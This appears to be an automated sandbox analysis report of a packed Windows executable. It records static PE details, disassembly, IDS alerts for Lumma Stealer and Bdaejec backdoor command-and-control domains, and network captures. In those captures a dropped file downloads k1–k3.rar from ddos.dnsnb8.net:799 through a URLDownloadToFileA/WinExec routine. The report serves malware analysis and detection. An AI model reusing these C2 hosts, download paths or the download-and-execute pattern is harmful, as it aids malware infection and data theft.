Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.417103896721939
Encrypted:	false
SSDEEP:	6144:ncifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuN05+:ci58oSWIZBk2MM6AFBSo
MD5:	C376AED44A7A2A7CBEFA427DE52C886E
SHA1:	A2E7E1E8B2F5621F440F66E729B9A6D3EF40641E
SHA-256:	97A9227DD902FB274FB023542852CDD30401DC2737D86947D0C8420716DE4EB9
SHA-512:	D5BB8CE1A5CBFE677A5FC876F58E14DFB9CFA51A5286A6E228D55082A21F92885368DB87934C756C489E1C41365FA47EB398F38BC9BB2896D7C810A544536DD8
Malicious:	false
Preview:	regfF...F....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.821341396665212
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Lisect_AVT_24003_G1A_70.exe
File size:	6'279'680 bytes
MD5:	641443f984c1754a4d606b248b334577
SHA1:	b618cd68aeb6ac78600f312c70ee484d6931559c
SHA256:	def706463545d7e16aa4a10449854f28bd979780cd227affd5c0c2ad52ae8026
SHA512:	4d08b9d4aa9269446d8f7efcb7182b662745754dad0e9a89b184bc9b6a1bcfda416e3944618134f11b0f052619f98d89f52a5ae675b6c99c77dd697d6d778a1a
SSDEEP:	98304:tLYyArRU+pKIYF3Wsh3zaVzMI5VAIU4hss+EaNJ5vuaPEWCNSbTwbCH:tJArvpK5eVIAu4EtvLEWnbTwe
TLSH:	8C5633D33704D4D5C0A58AB2095ED1E602693E3EA9B5407ABA1F7BCDC7310DCAF98B64
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......e.............................`............@.......................................@.................................F.3.l..

File Icon


Icon Hash:	1d9e677775470e9d

Static PE Info

General

Entrypoint:	0x1416000
Entrypoint Section:	;Mu
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x65CB930E [Tue Feb 13 16:04:30 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	49b6343a7e296cc33dfa349b97649cac

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0000016Ch
xor eax, eax
push ebx
push esi
push edi
mov dword ptr [ebp-24h], eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-14h], eax
mov dword ptr [ebp-08h], eax
mov dword ptr [ebp-0Ch], eax
mov dword ptr [ebp-20h], eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-48h], 764F486Fh
mov dword ptr [ebp-44h], 66424C5Ah
mov dword ptr [ebp-40h], 6578652Eh
mov dword ptr [ebp-3Ch], 00000000h
call 00007FCF287584A5h
pop eax
add eax, 00000225h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr fs:[00000030h]
mov dword ptr [ebp-28h], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax], E904C483h
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax+04h], FFB2C67Fh
mov eax, dword ptr [ebp-28h]
mov eax, dword ptr [eax+0Ch]
mov eax, dword ptr [eax+1Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+08h]
mov ecx, dword ptr [eax+3Ch]
mov ecx, dword ptr [ecx+eax+78h]
add ecx, eax
mov edi, dword ptr [ecx+1Ch]
mov ebx, dword ptr [ecx+20h]
mov esi, dword ptr [ecx+24h]
mov ecx, dword ptr [ecx+18h]
add esi, eax
add edi, eax
add ebx, eax
xor edx, edx
mov dword ptr [ebp-30h], esi
mov dword ptr [ebp-1Ch], edx
mov dword ptr [ebp-34h], ecx
cmp edx, dword ptr [ebp-34h]
jnc 00007FCF287585EEh
movzx ecx, word ptr [esi+edx*2]
mov edx, dword ptr [ebx+edx*4]
mov esi, dword ptr [edi+ecx*4]
add edx, eax
mov ecx, dword ptr [edx]
add esi, eax
cmp ecx, 4D746547h
jne 00007FCF287584F4h
cmp dword ptr [edx+04h], 6C75646Fh
jne 00007FCF287584EBh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x33d046	0x6c	.imports
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x33e000	0x658fc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x578f3	0x27a76	58c458b94800d91affd5355c227516ae	False	0.9938739825885656	data	7.961868081494972	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
	0x59000	0x1500	0xb0b	f597f377bdfaa40603d70ce1f9d28b1b	False	1.0038910505836576	data	7.8939207362765895	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
	0x5b000	0x10ef8	0xdae8	a2149b0a7fd3d86b40ae68694f2b16cd	False	0.998429693076374	data	7.948313514751607	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6c000	0xe804	0x77d5	411fc2a5d4cddb2c820e3471ce3916a3	False	0.9976855624735144	data	7.956946873009958	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
	0x7b000	0x2c1f88	0x8165e	b8e7b824e84434f71385a110baace88d	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.imports	0x33d000	0x1000	0x200	c53b7eff20be0e39153ee42ff8b0a5a2	False	0.185546875	data	1.3699486905026688	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x33e000	0x65a00	0x65a00	539cdad808cada6701185ef4a2eeefbe	False	0.09494397678351783	data	2.8350695622035795	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.themida	0x3a4000	0x79e000	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.boot	0xb42000	0x4d3c00	0x4d3ab2	31eb32323bbbc7c85eca4b546b5f0c7c	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
;Mu	0x1016000	0x5000	0x4200	c6f057a472e46ee30a3269f5cc90af88	False	0.7775804924242424	data	6.935039632025298	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x33e268	0xa068	Device independent bitmap graphic, 256 x 512 x 4, image size 32768	Raeto-Romance	Switzerland	0.1818868108318722
RT_ICON	0x3482e0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	Raeto-Romance	Switzerland	0.3469512195121951
RT_ICON	0x348958	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	Raeto-Romance	Switzerland	0.4529569892473118
RT_ICON	0x348c50	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	Raeto-Romance	Switzerland	0.5081967213114754
RT_ICON	0x348e48	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	Raeto-Romance	Switzerland	0.5709459459459459
RT_ICON	0x348f80	0x12428	Device independent bitmap graphic, 256 x 512 x 8, image size 65536, 256 important colors	Raeto-Romance	Switzerland	0.07974114878596641
RT_ICON	0x35b3b8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Raeto-Romance	Switzerland	0.25826226012793174
RT_ICON	0x35c270	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Raeto-Romance	Switzerland	0.29106498194945846
RT_ICON	0x35cb28	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Raeto-Romance	Switzerland	0.23049132947976878
RT_ICON	0x35d0a0	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 270336	Raeto-Romance	Switzerland	0.06457303902713259
RT_ICON	0x39f0d8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Raeto-Romance	Switzerland	0.18724066390041494
RT_ICON	0x3a1690	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Raeto-Romance	Switzerland	0.24648217636022515
RT_ICON	0x3a2748	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Raeto-Romance	Switzerland	0.32049180327868854
RT_ICON	0x3a30e0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Raeto-Romance	Switzerland	0.41400709219858156
RT_GROUP_ICON	0x3a3558	0xca	data	Raeto-Romance	Switzerland	0.5792079207920792
RT_VERSION	0x3a3634	0x2c8	data	Raeto-Romance	Switzerland	0.4943820224719101

Imports

DLL	Import
kernel32.dll	GetModuleHandleA
USER32.dll	GetDC
GDI32.dll	BitBlt

Possible Origin

Language of compilation system	Country where language is spoken	Map
Raeto-Romance	Switzerland

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-25T04:58:43.778567+0200	UDP	2050856	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (snuggleapplicationswo .fun)	63883	53	192.168.2.7	1.1.1.1
2024-07-25T04:58:43.766900+0200	UDP	2050858	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (theoryapparatusjuko .fun)	59294	53	192.168.2.7	1.1.1.1
2024-07-25T04:58:57.433919+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49708	52.165.165.26	192.168.2.7
2024-07-25T04:58:39.801665+0200	UDP	2838522	ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup	54401	53	192.168.2.7	1.1.1.1
2024-07-25T04:58:43.832441+0200	UDP	2050857	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (strainriskpropos .store)	50584	53	192.168.2.7	1.1.1.1
2024-07-25T04:58:44.570213+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49700	799	192.168.2.7	44.221.84.105
2024-07-25T04:59:36.509557+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	62958	52.165.165.26	192.168.2.7
2024-07-25T04:58:43.634105+0200	UDP	2050898	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (healthproline .pro)	63317	53	192.168.2.7	1.1.1.1
2024-07-25T04:58:43.800724+0200	UDP	2050860	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (punchtelephoneverdi .store)	64456	53	192.168.2.7	1.1.1.1
2024-07-25T04:59:03.851303+0200	TCP	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	62955	443	192.168.2.7	20.42.65.92
2024-07-25T04:58:47.684516+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49701	799	192.168.2.7	44.221.84.105
2024-07-25T04:58:40.340897+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49699	799	192.168.2.7	44.221.84.105
2024-07-25T04:58:43.789767+0200	UDP	2050861	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (smallrabbitcrossing .site)	61257	53	192.168.2.7	1.1.1.1
2024-07-25T04:58:43.811138+0200	UDP	2050859	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (telephoneverdictyow .site)	57262	53	192.168.2.7	1.1.1.1

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 04:58:39.913115025 CEST	49699	799	192.168.2.7	44.221.84.105
Jul 25, 2024 04:58:39.918036938 CEST	799	49699	44.221.84.105	192.168.2.7
Jul 25, 2024 04:58:39.918114901 CEST	49699	799	192.168.2.7	44.221.84.105
Jul 25, 2024 04:58:39.919585943 CEST	49699	799	192.168.2.7	44.221.84.105
Jul 25, 2024 04:58:39.924417019 CEST	799	49699	44.221.84.105	192.168.2.7
Jul 25, 2024 04:58:40.340756893 CEST	799	49699	44.221.84.105	192.168.2.7
Jul 25, 2024 04:58:40.340780973 CEST	799	49699	44.221.84.105	192.168.2.7
Jul 25, 2024 04:58:40.340897083 CEST	49699	799	192.168.2.7	44.221.84.105
Jul 25, 2024 04:58:40.510895014 CEST	49699	799	192.168.2.7	44.221.84.105
Jul 25, 2024 04:58:40.515867949 CEST	799	49699	44.221.84.105	192.168.2.7
Jul 25, 2024 04:58:44.138431072 CEST	49700	799	192.168.2.7	44.221.84.105
Jul 25, 2024 04:58:44.143348932 CEST	799	49700	44.221.84.105	192.168.2.7
Jul 25, 2024 04:58:44.143424034 CEST	49700	799	192.168.2.7	44.221.84.105
Jul 25, 2024 04:58:44.143667936 CEST	49700	799	192.168.2.7	44.221.84.105
Jul 25, 2024 04:58:44.154819965 CEST	799	49700	44.221.84.105	192.168.2.7
Jul 25, 2024 04:58:44.570142031 CEST	799	49700	44.221.84.105	192.168.2.7
Jul 25, 2024 04:58:44.570162058 CEST	799	49700	44.221.84.105	192.168.2.7
Jul 25, 2024 04:58:44.570213079 CEST	49700	799	192.168.2.7	44.221.84.105
Jul 25, 2024 04:58:44.570255995 CEST	49700	799	192.168.2.7	44.221.84.105
Jul 25, 2024 04:58:44.594873905 CEST	49700	799	192.168.2.7	44.221.84.105
Jul 25, 2024 04:58:44.600478888 CEST	799	49700	44.221.84.105	192.168.2.7
Jul 25, 2024 04:58:47.276040077 CEST	49701	799	192.168.2.7	44.221.84.105
Jul 25, 2024 04:58:47.281152010 CEST	799	49701	44.221.84.105	192.168.2.7
Jul 25, 2024 04:58:47.281296015 CEST	49701	799	192.168.2.7	44.221.84.105
Jul 25, 2024 04:58:47.282228947 CEST	49701	799	192.168.2.7	44.221.84.105
Jul 25, 2024 04:58:47.287045956 CEST	799	49701	44.221.84.105	192.168.2.7
Jul 25, 2024 04:58:47.684348106 CEST	799	49701	44.221.84.105	192.168.2.7
Jul 25, 2024 04:58:47.684366941 CEST	799	49701	44.221.84.105	192.168.2.7
Jul 25, 2024 04:58:47.684515953 CEST	49701	799	192.168.2.7	44.221.84.105
Jul 25, 2024 04:58:47.686522961 CEST	49701	799	192.168.2.7	44.221.84.105
Jul 25, 2024 04:58:47.691272020 CEST	799	49701	44.221.84.105	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 04:58:39.801665068 CEST	54401	53	192.168.2.7	1.1.1.1
Jul 25, 2024 04:58:39.897883892 CEST	53	54401	1.1.1.1	192.168.2.7
Jul 25, 2024 04:58:43.634104967 CEST	63317	53	192.168.2.7	1.1.1.1
Jul 25, 2024 04:58:43.758450985 CEST	53	63317	1.1.1.1	192.168.2.7
Jul 25, 2024 04:58:43.766900063 CEST	59294	53	192.168.2.7	1.1.1.1
Jul 25, 2024 04:58:43.775505066 CEST	53	59294	1.1.1.1	192.168.2.7
Jul 25, 2024 04:58:43.778567076 CEST	63883	53	192.168.2.7	1.1.1.1
Jul 25, 2024 04:58:43.787033081 CEST	53	63883	1.1.1.1	192.168.2.7
Jul 25, 2024 04:58:43.789767027 CEST	61257	53	192.168.2.7	1.1.1.1
Jul 25, 2024 04:58:43.798151016 CEST	53	61257	1.1.1.1	192.168.2.7
Jul 25, 2024 04:58:43.800724030 CEST	64456	53	192.168.2.7	1.1.1.1
Jul 25, 2024 04:58:43.809612036 CEST	53	64456	1.1.1.1	192.168.2.7
Jul 25, 2024 04:58:43.811137915 CEST	57262	53	192.168.2.7	1.1.1.1
Jul 25, 2024 04:58:43.829638958 CEST	53	57262	1.1.1.1	192.168.2.7
Jul 25, 2024 04:58:43.832441092 CEST	50584	53	192.168.2.7	1.1.1.1
Jul 25, 2024 04:58:43.850536108 CEST	53	50584	1.1.1.1	192.168.2.7
Jul 25, 2024 04:58:58.801143885 CEST	53	52240	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 25, 2024 04:58:39.801665068 CEST	192.168.2.7	1.1.1.1	0xe359	Standard query (0)	ddos.dnsnb8.net	A (IP address)	IN (0x0001)	false
Jul 25, 2024 04:58:43.634104967 CEST	192.168.2.7	1.1.1.1	0xca10	Standard query (0)	healthproline.pro	A (IP address)	IN (0x0001)	false
Jul 25, 2024 04:58:43.766900063 CEST	192.168.2.7	1.1.1.1	0xf4c7	Standard query (0)	theoryapparatusjuko.fun	A (IP address)	IN (0x0001)	false
Jul 25, 2024 04:58:43.778567076 CEST	192.168.2.7	1.1.1.1	0x6d06	Standard query (0)	snuggleapplicationswo.fun	A (IP address)	IN (0x0001)	false
Jul 25, 2024 04:58:43.789767027 CEST	192.168.2.7	1.1.1.1	0xf21c	Standard query (0)	smallrabbitcrossing.site	A (IP address)	IN (0x0001)	false
Jul 25, 2024 04:58:43.800724030 CEST	192.168.2.7	1.1.1.1	0xe467	Standard query (0)	punchtelephoneverdi.store	A (IP address)	IN (0x0001)	false
Jul 25, 2024 04:58:43.811137915 CEST	192.168.2.7	1.1.1.1	0xb889	Standard query (0)	telephoneverdictyow.site	A (IP address)	IN (0x0001)	false
Jul 25, 2024 04:58:43.832441092 CEST	192.168.2.7	1.1.1.1	0x30e	Standard query (0)	strainriskpropos.store	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 25, 2024 04:58:39.897883892 CEST	1.1.1.1	192.168.2.7	0xe359	No error (0)	ddos.dnsnb8.net		44.221.84.105	A (IP address)	IN (0x0001)	false
Jul 25, 2024 04:58:43.758450985 CEST	1.1.1.1	192.168.2.7	0xca10	Name error (3)	healthproline.pro	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 04:58:43.775505066 CEST	1.1.1.1	192.168.2.7	0xf4c7	Name error (3)	theoryapparatusjuko.fun	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 04:58:43.787033081 CEST	1.1.1.1	192.168.2.7	0x6d06	Name error (3)	snuggleapplicationswo.fun	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 04:58:43.798151016 CEST	1.1.1.1	192.168.2.7	0xf21c	Name error (3)	smallrabbitcrossing.site	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 04:58:43.809612036 CEST	1.1.1.1	192.168.2.7	0xe467	Name error (3)	punchtelephoneverdi.store	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 04:58:43.829638958 CEST	1.1.1.1	192.168.2.7	0xb889	Name error (3)	telephoneverdictyow.site	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 04:58:43.850536108 CEST	1.1.1.1	192.168.2.7	0x30e	Name error (3)	strainriskpropos.store	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ddos.dnsnb8.net:799

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	44.221.84.105	799	7520	C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 04:58:39.919585943 CEST	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49700	44.221.84.105	799	7520	C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 04:58:44.143667936 CEST	288	OUT	GET /cj//k2.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49701	44.221.84.105	799	7520	C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 04:58:47.282228947 CEST	288	OUT	GET /cj//k3.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Target ID:	0
Start time:	22:58:37
Start date:	24/07/2024
Path:	C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Lisect_AVT_24003_G1A_70.exe"
Imagebase:	0xde0000
File size:	6'279'680 bytes
MD5 hash:	641443F984C1754A4D606B248B334577
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	22:58:37
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\Temp\oHOvZLBf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\oHOvZLBf.exe
Imagebase:	0xdf0000
File size:	15'872 bytes
MD5 hash:	F7D21DE5C4E81341ECCD280C11DDCC9A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	22:58:46
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 1528
Imagebase:	0xaa0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	32.2%
Dynamic/Decrypted Code Coverage:	6.7%
Signature Coverage:	24.6%
Total number of Nodes:	285
Total number of Limit Nodes:	10

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00DF29E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00DF2A02
wsprintfA.USER32 ref: 00DF2A1A
memset.MSVCRT ref: 00DF2A44
lstrlen.KERNEL32(?), ref: 00DF2A54
lstrcpyn.KERNEL32(?,?,-00000001), ref: 00DF2A6C
strrchr.MSVCRT ref: 00DF2A7C
lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00DF2A9F
lstrlen.KERNEL32(Documents and Settings), ref: 00DF2AAE
memset.MSVCRT ref: 00DF2AC6
memset.MSVCRT ref: 00DF2ADA
FindFirstFileA.KERNEL32(?,?), ref: 00DF2AEF
memset.MSVCRT ref: 00DF2B13
lstrcmpiA.KERNEL32(?,?), ref: 00DF2B42
FindNextFileA.KERNEL32(00000000,?,?,?,?), ref: 00DF2B67
FindClose.KERNEL32(00000000), ref: 00DF2B6E

Strings

Documents and Settings, xrefs: 00DF2A8D, 00DF2A92, 00DF2A9A, 00DF2AAD
%s*, xrefs: 00DF2A14
C:\, xrefs: 00DF2A2F

Memory Dump Source

Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539370451.0000000000DF6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_df0000_oHOvZLBf.jbxd

Similarity

API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
String ID: %s*$C:\$Documents and Settings
API String ID: 2826467728-110786608
Opcode ID: 41f3919f97bbbf3e1bfbea5f38fd95cf534fade2cd891cf6b5cef98bdebb63e2
Instruction ID: 1a0b46f25f00774a09e44d64489c428f9f2cf3aca54179699092c7434329ad39
Opcode Fuzzy Hash: 41f3919f97bbbf3e1bfbea5f38fd95cf534fade2cd891cf6b5cef98bdebb63e2
Instruction Fuzzy Hash: F84142B2404349AFD721DFA0DC49DFB77ACEB84315F06882AFA44D2111EA34D648CBB6

Function 00DF1099 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 74
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00DF185B: GetSystemTimeAsFileTime.KERNEL32(00DF1F92,00000000,?,00000000,?,?,?,00DF1F92,?,00000000,00000002), ref: 00DF1867
Part of subcall function 00DF185B: srand.MSVCRT ref: 00DF1878
Part of subcall function 00DF185B: rand.MSVCRT ref: 00DF1880
Part of subcall function 00DF185B: srand.MSVCRT ref: 00DF1890
Part of subcall function 00DF185B: rand.MSVCRT ref: 00DF1894

WinExec.KERNEL32(?,00000005), ref: 00DF10F1
lstrlen.KERNEL32(00DF4748), ref: 00DF10FA
wsprintfA.USER32 ref: 00DF112A
wsprintfA.USER32 ref: 00DF1143
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00DF115B
lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00DF1169
Sleep.KERNEL32 ref: 00DF1179

Strings

%s%.8X.exe, xrefs: 00DF1124
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00DF1119
ddos.dnsnb8.net, xrefs: 00DF10C8, 00DF10CF, 00DF1140, 00DF1168
http://%s:%d/%s/%s, xrefs: 00DF10C2, 00DF1141
cj/, xrefs: 00DF1135

Memory Dump Source

Source File: 00000002.00000002.1539311409.0000000000DF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00DF0000, based on PE: true

Associated: 00000002.00000002.1539292358.0000000000DF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539334035.0000000000DF3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1539352310.0000000000DF4000.00000004.00000001.01000000.00000004.sdmpDownload File
